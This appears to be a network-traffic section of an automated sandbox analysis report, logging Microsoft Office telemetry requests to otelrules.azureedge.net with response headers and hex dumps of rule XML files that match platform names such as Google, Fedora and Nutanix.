                                          2024-11-18 22:44:54 UTC479INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120644" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120643" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          70192.168.2.45735013.107.246.45443
                                          TimestampBytes transferredDirectionData
                                          2024-11-18 22:44:54 UTC192OUTGET /rules/rule120651v0s19.xml HTTP/1.1
                                          Connection: Keep-Alive
                                          Accept-Encoding: gzip
                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                          Host: otelrules.azureedge.net
                                          2024-11-18 22:44:54 UTC491INHTTP/1.1 200 OK
                                          Date: Mon, 18 Nov 2024 22:44:54 GMT
                                          Content-Type: text/xml
                                          Content-Length: 415
                                          Connection: close
                                          Cache-Control: public, max-age=604800, immutable
                                          Last-Modified: Tue, 09 Apr 2024 00:26:10 GMT
                                          ETag: "0x8DC582BA80D96A1"
                                          x-ms-request-id: 56737357-c01e-0014-3efa-36a6a3000000
                                          x-ms-version: 2018-03-28
                                          x-azure-ref: 20241118T224454Z-17cf5b775c4jcv75hC1DFW1gm000000000d0000000002qfs
                                          x-fd-int-roxy-purgeid: 0
                                          X-Cache-Info: L1_T2
                                          X-Cache: TCP_HIT
                                          Accept-Ranges: bytes
                                          2024-11-18 22:44:54 UTC415INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 47 67 5d 5b 4f 6f 5d 5b 4f 6f 5d 5b 47 67 5d 5b 4c 6c 5d 5b 45 65 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75
                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120651" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120649" /> <SR T="2" R="([Gg][Oo][Oo][Gg][Ll][Ee])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tru


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          71192.168.2.45734913.107.246.45443
                                          TimestampBytes transferredDirectionData
                                          2024-11-18 22:44:54 UTC192OUTGET /rules/rule120649v0s19.xml HTTP/1.1
                                          Connection: Keep-Alive
                                          Accept-Encoding: gzip
                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                          Host: otelrules.azureedge.net
                                          2024-11-18 22:44:54 UTC470INHTTP/1.1 200 OK
                                          Date: Mon, 18 Nov 2024 22:44:54 GMT
                                          Content-Type: text/xml
                                          Content-Length: 416
                                          Connection: close
                                          Cache-Control: public, max-age=604800, immutable
                                          Last-Modified: Tue, 09 Apr 2024 00:26:21 GMT
                                          ETag: "0x8DC582BAEA4B445"
                                          x-ms-request-id: 04602d1e-901e-00ac-286c-37b69e000000
                                          x-ms-version: 2018-03-28
                                          x-azure-ref: 20241118T224454Z-164f84587bfjxw6fhC1DFWq94400000006kg00000000hwpz
                                          x-fd-int-roxy-purgeid: 0
                                          X-Cache: TCP_HIT
                                          Accept-Ranges: bytes
                                          2024-11-18 22:44:54 UTC416INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 46 66 5d 5b 45 65 5d 5b 44 64 5d 5b 4f 6f 5d 5b 52 72 5d 5b 41 61 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72
                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120649" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120647" /> <SR T="2" R="^([Ff][Ee][Dd][Oo][Rr][Aa])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tr


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          72192.168.2.45734813.107.246.45443
                                          TimestampBytes transferredDirectionData
                                          2024-11-18 22:44:54 UTC192OUTGET /rules/rule120650v0s19.xml HTTP/1.1
                                          Connection: Keep-Alive
                                          Accept-Encoding: gzip
                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                          Host: otelrules.azureedge.net
                                          2024-11-18 22:44:54 UTC491INHTTP/1.1 200 OK
                                          Date: Mon, 18 Nov 2024 22:44:54 GMT
                                          Content-Type: text/xml
                                          Content-Length: 479
                                          Connection: close
                                          Cache-Control: public, max-age=604800, immutable
                                          Last-Modified: Tue, 09 Apr 2024 00:25:44 GMT
                                          ETag: "0x8DC582B989EE75B"
                                          x-ms-request-id: a914475d-501e-00a0-6190-379d9f000000
                                          x-ms-version: 2018-03-28
                                          x-azure-ref: 20241118T224454Z-16547b76f7fhv4d5hC1DFW7h0n00000004s000000000qnsn
                                          x-fd-int-roxy-purgeid: 0
                                          X-Cache-Info: L1_T2
                                          X-Cache: TCP_HIT
                                          Accept-Ranges: bytes
                                          2024-11-18 22:44:54 UTC479INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120650" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120649" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          73192.168.2.45735113.107.246.45443
                                          TimestampBytes transferredDirectionData
                                          2024-11-18 22:44:54 UTC192OUTGET /rules/rule120652v0s19.xml HTTP/1.1
                                          Connection: Keep-Alive
                                          Accept-Encoding: gzip
                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                          Host: otelrules.azureedge.net
                                          2024-11-18 22:44:54 UTC491INHTTP/1.1 200 OK
                                          Date: Mon, 18 Nov 2024 22:44:54 GMT
                                          Content-Type: text/xml
                                          Content-Length: 471
                                          Connection: close
                                          Cache-Control: public, max-age=604800, immutable
                                          Last-Modified: Tue, 09 Apr 2024 00:25:43 GMT
                                          ETag: "0x8DC582B97E6FCDD"
                                          x-ms-request-id: 885b02a2-801e-0035-1509-37752a000000
                                          x-ms-version: 2018-03-28
                                          x-azure-ref: 20241118T224454Z-16547b76f7ffqpvqhC1DFWwf3n00000000xg000000008s1b
                                          x-fd-int-roxy-purgeid: 0
                                          X-Cache-Info: L1_T2
                                          X-Cache: TCP_HIT
                                          Accept-Ranges: bytes
                                          2024-11-18 22:44:54 UTC471INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120652" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120651" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          74192.168.2.45735213.107.246.45443
                                          TimestampBytes transferredDirectionData
                                          2024-11-18 22:44:55 UTC192OUTGET /rules/rule120653v0s19.xml HTTP/1.1
                                          Connection: Keep-Alive
                                          Accept-Encoding: gzip
                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                          Host: otelrules.azureedge.net
                                          2024-11-18 22:44:55 UTC491INHTTP/1.1 200 OK
                                          Date: Mon, 18 Nov 2024 22:44:55 GMT
                                          Content-Type: text/xml
                                          Content-Length: 419
                                          Connection: close
                                          Cache-Control: public, max-age=604800, immutable
                                          Last-Modified: Tue, 09 Apr 2024 00:25:51 GMT
                                          ETag: "0x8DC582B9C710B28"
                                          x-ms-request-id: b85626fa-d01e-0017-75bb-37b035000000
                                          x-ms-version: 2018-03-28
                                          x-azure-ref: 20241118T224455Z-16547b76f7fpdsp9hC1DFW8f50000000040g00000000hx3h
                                          x-fd-int-roxy-purgeid: 0
                                          X-Cache-Info: L1_T2
                                          X-Cache: TCP_HIT
                                          Accept-Ranges: bytes
                                          2024-11-18 22:44:55 UTC419INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 49 69 5d 5b 4e 6e 5d 5b 4e 6e 5d 5b 4f 6f 5d 5b 54 74 5d 5b 45 65 5d 5b 4b 6b 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d
                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120653" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120651" /> <SR T="2" R="([Ii][Nn][Nn][Oo][Tt][Ee][Kk])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          75192.168.2.45735513.107.246.45443
                                          TimestampBytes transferredDirectionData
                                          2024-11-18 22:44:55 UTC192OUTGET /rules/rule120655v0s19.xml HTTP/1.1
                                          Connection: Keep-Alive
                                          Accept-Encoding: gzip
                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                          Host: otelrules.azureedge.net
                                          2024-11-18 22:44:55 UTC491INHTTP/1.1 200 OK
                                          Date: Mon, 18 Nov 2024 22:44:55 GMT
                                          Content-Type: text/xml
                                          Content-Length: 419
                                          Connection: close
                                          Cache-Control: public, max-age=604800, immutable
                                          Last-Modified: Tue, 09 Apr 2024 00:26:37 GMT
                                          ETag: "0x8DC582BB7F164C3"
                                          x-ms-request-id: 763850b9-e01e-0071-4d09-3708e7000000
                                          x-ms-version: 2018-03-28
                                          x-azure-ref: 20241118T224455Z-r18f44ddb69vchkhhC1DFWc4bs00000000dg00000000ce8r
                                          x-fd-int-roxy-purgeid: 0
                                          X-Cache-Info: L1_T2
                                          X-Cache: TCP_HIT
                                          Accept-Ranges: bytes
                                          2024-11-18 22:44:55 UTC419INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4e 6e 5d 5b 49 69 5d 5b 4d 6d 5d 5b 42 62 5d 5b 4f 6f 5d 5b 58 78 5d 5b 58 78 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d
                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120655" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120653" /> <SR T="2" R="([Nn][Ii][Mm][Bb][Oo][Xx][Xx])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          76192.168.2.45735613.107.246.45443
                                          TimestampBytes transferredDirectionData
                                          2024-11-18 22:44:55 UTC192OUTGET /rules/rule120656v0s19.xml HTTP/1.1
                                          Connection: Keep-Alive
                                          Accept-Encoding: gzip
                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                          Host: otelrules.azureedge.net
                                          2024-11-18 22:44:55 UTC491INHTTP/1.1 200 OK
                                          Date: Mon, 18 Nov 2024 22:44:55 GMT
                                          Content-Type: text/xml
                                          Content-Length: 477
                                          Connection: close
                                          Cache-Control: public, max-age=604800, immutable
                                          Last-Modified: Tue, 09 Apr 2024 00:26:04 GMT
                                          ETag: "0x8DC582BA48B5BDD"
                                          x-ms-request-id: eef1fd5d-a01e-006f-4c9a-3613cd000000
                                          x-ms-version: 2018-03-28
                                          x-azure-ref: 20241118T224455Z-17cf5b775c4jp6njhC1DFW19kn00000000mg000000001g34
                                          x-fd-int-roxy-purgeid: 0
                                          X-Cache: TCP_HIT
                                          X-Cache-Info: L1_T2
                                          Accept-Ranges: bytes
                                          2024-11-18 22:44:55 UTC477INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120656" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120655" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          77192.168.2.45735713.107.246.45443
                                          TimestampBytes transferredDirectionData
                                          2024-11-18 22:44:55 UTC192OUTGET /rules/rule120657v0s19.xml HTTP/1.1
                                          Connection: Keep-Alive
                                          Accept-Encoding: gzip
                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                          Host: otelrules.azureedge.net
                                          2024-11-18 22:44:55 UTC491INHTTP/1.1 200 OK
                                          Date: Mon, 18 Nov 2024 22:44:55 GMT
                                          Content-Type: text/xml
                                          Content-Length: 419
                                          Connection: close
                                          Cache-Control: public, max-age=604800, immutable
                                          Last-Modified: Tue, 09 Apr 2024 00:25:57 GMT
                                          ETag: "0x8DC582B9FF95F80"
                                          x-ms-request-id: 33178deb-401e-0048-6eb6-370409000000
                                          x-ms-version: 2018-03-28
                                          x-azure-ref: 20241118T224455Z-16547b76f7ftfv4jhC1DFWuhug00000003x0000000011pfp
                                          x-fd-int-roxy-purgeid: 0
                                          X-Cache-Info: L1_T2
                                          X-Cache: TCP_HIT
                                          Accept-Ranges: bytes
                                          2024-11-18 22:44:55 UTC419INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4e 6e 5d 5b 55 75 5d 5b 54 74 5d 5b 41 61 5d 5b 4e 6e 5d 5b 49 69 5d 5b 58 78 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d
                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120657" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120655" /> <SR T="2" R="([Nn][Uu][Tt][Aa][Nn][Ii][Xx])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          78192.168.2.45735413.107.246.45443
                                          TimestampBytes transferredDirectionData
                                          2024-11-18 22:44:55 UTC192OUTGET /rules/rule120654v0s19.xml HTTP/1.1
                                          Connection: Keep-Alive
                                          Accept-Encoding: gzip
                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                          Host: otelrules.azureedge.net
                                          2024-11-18 22:44:55 UTC470INHTTP/1.1 200 OK
                                          Date: Mon, 18 Nov 2024 22:44:55 GMT
                                          Content-Type: text/xml
                                          Content-Length: 477
                                          Connection: close
                                          Cache-Control: public, max-age=604800, immutable
                                          Last-Modified: Tue, 09 Apr 2024 00:26:05 GMT
                                          ETag: "0x8DC582BA54DCC28"
                                          x-ms-request-id: 4dbbda22-e01e-0033-5212-374695000000
                                          x-ms-version: 2018-03-28
                                          x-azure-ref: 20241118T224455Z-164f84587bfsgfx9hC1DFWw1as000000067g00000000xgzn
                                          x-fd-int-roxy-purgeid: 0
                                          X-Cache: TCP_HIT
                                          Accept-Ranges: bytes
                                          2024-11-18 22:44:55 UTC477INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120654" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120653" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          79192.168.2.45735813.107.246.45443
                                          TimestampBytes transferredDirectionData
                                          2024-11-18 22:44:55 UTC192OUTGET /rules/rule120658v0s19.xml HTTP/1.1
                                          Connection: Keep-Alive
                                          Accept-Encoding: gzip
                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                          Host: otelrules.azureedge.net
                                          2024-11-18 22:44:56 UTC491INHTTP/1.1 200 OK
                                          Date: Mon, 18 Nov 2024 22:44:56 GMT
                                          Content-Type: text/xml
                                          Content-Length: 472
                                          Connection: close
                                          Cache-Control: public, max-age=604800, immutable
                                          Last-Modified: Tue, 09 Apr 2024 00:26:34 GMT
                                          ETag: "0x8DC582BB650C2EC"
                                          x-ms-request-id: 760e684f-301e-0000-24f8-36eecc000000
                                          x-ms-version: 2018-03-28
                                          x-azure-ref: 20241118T224456Z-164f84587bfs5tz9hC1DFW9a3w00000006hg00000000dgdd
                                          x-fd-int-roxy-purgeid: 0
                                          X-Cache-Info: L1_T2
                                          X-Cache: TCP_HIT
                                          Accept-Ranges: bytes
                                          2024-11-18 22:44:56 UTC472INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120658" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120657" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          80192.168.2.45735913.107.246.45443
                                          TimestampBytes transferredDirectionData
                                          2024-11-18 22:44:56 UTC192OUTGET /rules/rule120659v0s19.xml HTTP/1.1
                                          Connection: Keep-Alive
                                          Accept-Encoding: gzip
                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                          Host: otelrules.azureedge.net
                                          2024-11-18 22:44:56 UTC491INHTTP/1.1 200 OK
                                          Date: Mon, 18 Nov 2024 22:44:56 GMT
                                          Content-Type: text/xml
                                          Content-Length: 468
                                          Connection: close
                                          Cache-Control: public, max-age=604800, immutable
                                          Last-Modified: Tue, 09 Apr 2024 00:26:30 GMT
                                          ETag: "0x8DC582BB3EAF226"
                                          x-ms-request-id: f18609ef-501e-008f-15e9-399054000000
                                          x-ms-version: 2018-03-28
                                          x-azure-ref: 20241118T224456Z-r18f44ddb694v9hbhC1DFW4shn00000000fg00000000aksb
                                          x-fd-int-roxy-purgeid: 0
                                          X-Cache: TCP_HIT
                                          X-Cache-Info: L1_T2
                                          Accept-Ranges: bytes
